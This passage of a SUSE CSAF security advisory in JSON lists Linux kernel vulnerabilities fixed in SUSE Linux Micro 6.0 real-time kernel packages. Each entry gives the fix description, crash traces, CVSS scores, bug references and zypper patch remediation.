"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54304",
"url": "https://www.suse.com/security/cve/CVE-2023-54304"
},
{
"category": "external",
"summary": "SUSE Bug 1255786 for CVE-2023-54304",
"url": "https://bugzilla.suse.com/1255786"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54304"
},
{
"cve": "CVE-2023-54309",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54309"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ntpm: tpm_vtpm_proxy: fix a race condition in /dev/vtpmx creation\n\n/dev/vtpmx is made visible before \u0027workqueue\u0027 is initialized, which can\nlead to a memory corruption in the worst case scenario.\n\nAddress this by initializing \u0027workqueue\u0027 as the very first step of the\ndriver initialization.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54309",
"url": "https://www.suse.com/security/cve/CVE-2023-54309"
},
{
"category": "external",
"summary": "SUSE Bug 1255780 for CVE-2023-54309",
"url": "https://bugzilla.suse.com/1255780"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54309"
},
{
"cve": "CVE-2023-54312",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54312"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsamples/bpf: Fix buffer overflow in tcp_basertt\n\nUsing sizeof(nv) or strlen(nv)+1 is correct.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54312",
"url": "https://www.suse.com/security/cve/CVE-2023-54312"
},
{
"category": "external",
"summary": "SUSE Bug 1255774 for CVE-2023-54312",
"url": "https://bugzilla.suse.com/1255774"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54312"
},
{
"cve": "CVE-2023-54313",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54313"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\novl: fix null pointer dereference in ovl_get_acl_rcu()\n\nFollowing process:\n P1 P2\n path_openat\n link_path_walk\n may_lookup\n inode_permission(rcu)\n ovl_permission\n acl_permission_check\n check_acl\n get_cached_acl_rcu\n\t ovl_get_inode_acl\n\t realinode = ovl_inode_real(ovl_inode)\n\t drop_cache\n\t\t __dentry_kill(ovl_dentry)\n\t\t\t\tiput(ovl_inode)\n\t\t ovl_destroy_inode(ovl_inode)\n\t\t dput(oi-\u003e__upperdentry)\n\t\t dentry_kill(upperdentry)\n\t\t dentry_unlink_inode\n\t\t\t\t upperdentry-\u003ed_inode = NULL\n\t ovl_inode_upper\n\t upperdentry = ovl_i_dentry_upper(ovl_inode)\n\t d_inode(upperdentry) // returns NULL\n\t IS_POSIXACL(realinode) // NULL pointer dereference\n, will trigger an null pointer dereference at realinode:\n [ 205.472797] BUG: kernel NULL pointer dereference, address:\n 0000000000000028\n [ 205.476701] CPU: 2 PID: 2713 Comm: ls Not tainted\n 6.3.0-12064-g2edfa098e750-dirty #1216\n [ 205.478754] RIP: 0010:do_ovl_get_acl+0x5d/0x300\n [ 205.489584] Call Trace:\n [ 205.489812] \u003cTASK\u003e\n [ 205.490014] ovl_get_inode_acl+0x26/0x30\n [ 205.490466] get_cached_acl_rcu+0x61/0xa0\n [ 205.490908] generic_permission+0x1bf/0x4e0\n [ 205.491447] ovl_permission+0x79/0x1b0\n [ 205.491917] inode_permission+0x15e/0x2c0\n [ 205.492425] link_path_walk+0x115/0x550\n [ 205.493311] path_lookupat.isra.0+0xb2/0x200\n [ 205.493803] filename_lookup+0xda/0x240\n [ 205.495747] vfs_fstatat+0x7b/0xb0\n\nFetch a reproducer in [Link].\n\nUse the helper ovl_i_path_realinode() to get realinode and then do\nnon-nullptr checking.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54313",
"url": "https://www.suse.com/security/cve/CVE-2023-54313"
},
{
"category": "external",
"summary": "SUSE Bug 1255775 for CVE-2023-54313",
"url": "https://bugzilla.suse.com/1255775"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54313"
},
{
"cve": "CVE-2023-54314",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54314"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: af9005: Fix null-ptr-deref in af9005_i2c_xfer\n\nIn af9005_i2c_xfer, msg is controlled by user. When msg[i].buf\nis null and msg[i].len is zero, former checks on msg[i].buf would be\npassed. Malicious data finally reach af9005_i2c_xfer. If accessing\nmsg[i].buf[0] without sanity check, null ptr deref would happen.\nWe add check on msg[i].len to prevent crash.\n\nSimilar commit:\ncommit 0ed554fd769a\n(\"media: dvb-usb: az6027: fix null-ptr-deref in az6027_i2c_xfer()\")",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54314",
"url": "https://www.suse.com/security/cve/CVE-2023-54314"
},
{
"category": "external",
"summary": "SUSE Bug 1255776 for CVE-2023-54314",
"url": "https://bugzilla.suse.com/1255776"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54314"
},
{
"cve": "CVE-2023-54315",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54315"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\npowerpc/powernv/sriov: perform null check on iov before dereferencing iov\n\nCurrently pointer iov is being dereferenced before the null check of iov\nwhich can lead to null pointer dereference errors. Fix this by moving the\niov null check before the dereferencing.\n\nDetected using cppcheck static analysis:\nlinux/arch/powerpc/platforms/powernv/pci-sriov.c:597:12: warning: Either\nthe condition \u0027!iov\u0027 is redundant or there is possible null pointer\ndereference: iov. [nullPointerRedundantCheck]\n num_vfs = iov-\u003enum_vfs;\n ^",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54315",
"url": "https://www.suse.com/security/cve/CVE-2023-54315"
},
{
"category": "external",
"summary": "SUSE Bug 1255769 for CVE-2023-54315",
"url": "https://bugzilla.suse.com/1255769"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54315"
},
{
"cve": "CVE-2023-54316",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54316"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nrefscale: Fix uninitalized use of wait_queue_head_t\n\nRunning the refscale test occasionally crashes the kernel with the\nfollowing error:\n\n[ 8569.952896] BUG: unable to handle page fault for address: ffffffffffffffe8\n[ 8569.952900] #PF: supervisor read access in kernel mode\n[ 8569.952902] #PF: error_code(0x0000) - not-present page\n[ 8569.952904] PGD c4b048067 P4D c4b049067 PUD c4b04b067 PMD 0\n[ 8569.952910] Oops: 0000 [#1] PREEMPT_RT SMP NOPTI\n[ 8569.952916] Hardware name: Dell Inc. PowerEdge R750/0WMWCR, BIOS 1.2.4 05/28/2021\n[ 8569.952917] RIP: 0010:prepare_to_wait_event+0x101/0x190\n :\n[ 8569.952940] Call Trace:\n[ 8569.952941] \u003cTASK\u003e\n[ 8569.952944] ref_scale_reader+0x380/0x4a0 [refscale]\n[ 8569.952959] kthread+0x10e/0x130\n[ 8569.952966] ret_from_fork+0x1f/0x30\n[ 8569.952973] \u003c/TASK\u003e\n\nThe likely cause is that init_waitqueue_head() is called after the call to\nthe torture_create_kthread() function that creates the ref_scale_reader\nkthread. Although this init_waitqueue_head() call will very likely\ncomplete before this kthread is created and starts running, it is\npossible that the calling kthread will be delayed between the calls to\ntorture_create_kthread() and init_waitqueue_head(). In this case, the\nnew kthread will use the waitqueue head before it is properly initialized,\nwhich is not good for the kernel\u0027s health and well-being.\n\nThe above crash happened here:\n\n\tstatic inline void __add_wait_queue(...)\n\t{\n\t\t:\n\t\tif (!(wq-\u003eflags \u0026 WQ_FLAG_PRIORITY)) \u003c=== Crash here\n\nThe offset of flags from list_head entry in wait_queue_entry is\n-0x18. If reader_tasks[i].wq.head.next is NULL as allocated reader_task\nstructure is zero initialized, the instruction will try to access address\n0xffffffffffffffe8, which is exactly the fault address listed above.\n\nThis commit therefore invokes init_waitqueue_head() before creating\nthe kthread.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54316",
"url": "https://www.suse.com/security/cve/CVE-2023-54316"
},
{
"category": "external",
"summary": "SUSE Bug 1255770 for CVE-2023-54316",
"url": "https://bugzilla.suse.com/1255770"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54316"
},
{
"cve": "CVE-2023-54318",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54318"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/smc: use smc_lgr_list.lock to protect smc_lgr_list.list iterate in smcr_port_add\n\nWhile doing smcr_port_add, there maybe linkgroup add into or delete\nfrom smc_lgr_list.list at the same time, which may result kernel crash.\nSo, use smc_lgr_list.lock to protect smc_lgr_list.list iterate in\nsmcr_port_add.\n\nThe crash calltrace show below:\nBUG: kernel NULL pointer dereference, address: 0000000000000000\nPGD 0 P4D 0\nOops: 0000 [#1] SMP NOPTI\nCPU: 0 PID: 559726 Comm: kworker/0:92 Kdump: loaded Tainted: G\nHardware name: Alibaba Cloud Alibaba Cloud ECS, BIOS 449e491 04/01/2014\nWorkqueue: events smc_ib_port_event_work [smc]\nRIP: 0010:smcr_port_add+0xa6/0xf0 [smc]\nRSP: 0000:ffffa5a2c8f67de0 EFLAGS: 00010297\nRAX: 0000000000000001 RBX: ffff9935e0650000 RCX: 0000000000000000\nRDX: 0000000000000010 RSI: ffff9935e0654290 RDI: ffff9935c8560000\nRBP: 0000000000000000 R08: 0000000000000000 R09: ffff9934c0401918\nR10: 0000000000000000 R11: ffffffffb4a5c278 R12: ffff99364029aae4\nR13: ffff99364029aa00 R14: 00000000ffffffed R15: ffff99364029ab08\nFS: 0000000000000000(0000) GS:ffff994380600000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 0000000000000000 CR3: 0000000f06a10003 CR4: 0000000002770ef0\nPKRU: 55555554\nCall Trace:\n smc_ib_port_event_work+0x18f/0x380 [smc]\n process_one_work+0x19b/0x340\n worker_thread+0x30/0x370\n ? process_one_work+0x340/0x340\n kthread+0x114/0x130\n ? __kthread_cancel_work+0x50/0x50\n ret_from_fork+0x1f/0x30",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54318",
"url": "https://www.suse.com/security/cve/CVE-2023-54318"
},
{
"category": "external",
"summary": "SUSE Bug 1255772 for CVE-2023-54318",
"url": "https://bugzilla.suse.com/1255772"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54318"
},
{
"cve": "CVE-2023-54319",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54319"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\npinctrl: at91-pio4: check return value of devm_kasprintf()\n\ndevm_kasprintf() returns a pointer to dynamically allocated memory.\nPointer could be NULL in case allocation fails. Check pointer validity.\nIdentified with coccinelle (kmerr.cocci script).\n\nDepends-on: 1c4e5c470a56 (\"pinctrl: at91: use devm_kasprintf() to avoid potential leaks\")\nDepends-on: 5a8f9cf269e8 (\"pinctrl: at91-pio4: use proper format specifier for unsigned int\")",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54319",
"url": "https://www.suse.com/security/cve/CVE-2023-54319"
},
{
"category": "external",
"summary": "SUSE Bug 1255760 for CVE-2023-54319",
"url": "https://bugzilla.suse.com/1255760"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54319"
},
{
"cve": "CVE-2023-54322",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54322"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\narm64: set __exception_irq_entry with __irq_entry as a default\n\nfilter_irq_stacks() is supposed to cut entries which are related irq entries\nfrom its call stack.\nAnd in_irqentry_text() which is called by filter_irq_stacks()\nuses __irqentry_text_start/end symbol to find irq entries in callstack.\n\nBut it doesn\u0027t work correctly as without \"CONFIG_FUNCTION_GRAPH_TRACER\",\narm64 kernel doesn\u0027t include gic_handle_irq which is entry point of arm64 irq\nbetween __irqentry_text_start and __irqentry_text_end as we discussed in below link.\nhttps://lore.kernel.org/all/CACT4Y+aReMGLYua2rCLHgFpS9io5cZC04Q8GLs-uNmrn1ezxYQ@mail.gmail.com/#t\n\nThis problem can makes unintentional deep call stack entries especially\nin KASAN enabled situation as below.\n\n[ 2479.383395]I[0:launcher-loader: 1719] Stack depot reached limit capacity\n[ 2479.383538]I[0:launcher-loader: 1719] WARNING: CPU: 0 PID: 1719 at lib/stackdepot.c:129 __stack_depot_save+0x464/0x46c\n[ 2479.385693]I[0:launcher-loader: 1719] pstate: 624000c5 (nZCv daIF +PAN -UAO +TCO -DIT -SSBS BTYPE=--)\n[ 2479.385724]I[0:launcher-loader: 1719] pc : __stack_depot_save+0x464/0x46c\n[ 2479.385751]I[0:launcher-loader: 1719] lr : __stack_depot_save+0x460/0x46c\n[ 2479.385774]I[0:launcher-loader: 1719] sp : ffffffc0080073c0\n[ 2479.385793]I[0:launcher-loader: 1719] x29: ffffffc0080073e0 x28: ffffffd00b78a000 x27: 0000000000000000\n[ 2479.385839]I[0:launcher-loader: 1719] x26: 000000000004d1dd x25: ffffff891474f000 x24: 00000000ca64d1dd\n[ 2479.385882]I[0:launcher-loader: 1719] x23: 0000000000000200 x22: 0000000000000220 x21: 0000000000000040\n[ 2479.385925]I[0:launcher-loader: 1719] x20: ffffffc008007440 x19: 0000000000000000 x18: 0000000000000000\n[ 2479.385969]I[0:launcher-loader: 1719] x17: 2065726568207475 x16: 000000000000005e x15: 2d2d2d2d2d2d2d20\n[ 2479.386013]I[0:launcher-loader: 1719] x14: 5d39313731203a72 x13: 00000000002f6b30 x12: 00000000002f6af8\n[ 2479.386057]I[0:launcher-loader: 1719] x11: 00000000ffffffff x10: ffffffb90aacf000 x9 : e8a74a6c16008800\n[ 2479.386101]I[0:launcher-loader: 1719] x8 : e8a74a6c16008800 x7 : 00000000002f6b30 x6 : 00000000002f6af8\n[ 2479.386145]I[0:launcher-loader: 1719] x5 : ffffffc0080070c8 x4 : ffffffd00b192380 x3 : ffffffd0092b313c\n[ 2479.386189]I[0:launcher-loader: 1719] x2 : 0000000000000001 x1 : 0000000000000004 x0 : 0000000000000022\n[ 2479.386231]I[0:launcher-loader: 1719] Call trace:\n[ 2479.386248]I[0:launcher-loader: 1719] __stack_depot_save+0x464/0x46c\n[ 2479.386273]I[0:launcher-loader: 1719] kasan_save_stack+0x58/0x70\n[ 2479.386303]I[0:launcher-loader: 1719] save_stack_info+0x34/0x138\n[ 2479.386331]I[0:launcher-loader: 1719] kasan_save_free_info+0x18/0x24\n[ 2479.386358]I[0:launcher-loader: 1719] ____kasan_slab_free+0x16c/0x170\n[ 2479.386385]I[0:launcher-loader: 1719] __kasan_slab_free+0x10/0x20\n[ 2479.386410]I[0:launcher-loader: 1719] kmem_cache_free+0x238/0x53c\n[ 2479.386435]I[0:launcher-loader: 1719] mempool_free_slab+0x1c/0x28\n[ 2479.386460]I[0:launcher-loader: 1719] mempool_free+0x7c/0x1a0\n[ 2479.386484]I[0:launcher-loader: 1719] bvec_free+0x34/0x80\n[ 2479.386514]I[0:launcher-loader: 1719] bio_free+0x60/0x98\n[ 2479.386540]I[0:launcher-loader: 1719] bio_put+0x50/0x21c\n[ 2479.386567]I[0:launcher-loader: 1719] f2fs_write_end_io+0x4ac/0x4d0\n[ 2479.386594]I[0:launcher-loader: 1719] bio_endio+0x2dc/0x300\n[ 2479.386622]I[0:launcher-loader: 1719] __dm_io_complete+0x324/0x37c\n[ 2479.386650]I[0:launcher-loader: 1719] dm_io_dec_pending+0x60/0xa4\n[ 2479.386676]I[0:launcher-loader: 1719] clone_endio+0xf8/0x2f0\n[ 2479.386700]I[0:launcher-loader: 1719] bio_endio+0x2dc/0x300\n[ 2479.386727]I[0:launcher-loader: 1719] blk_update_request+0x258/0x63c\n[ 2479.386754]I[0:launcher-loader: 1719] scsi_end_request+0x50/0x304\n[ 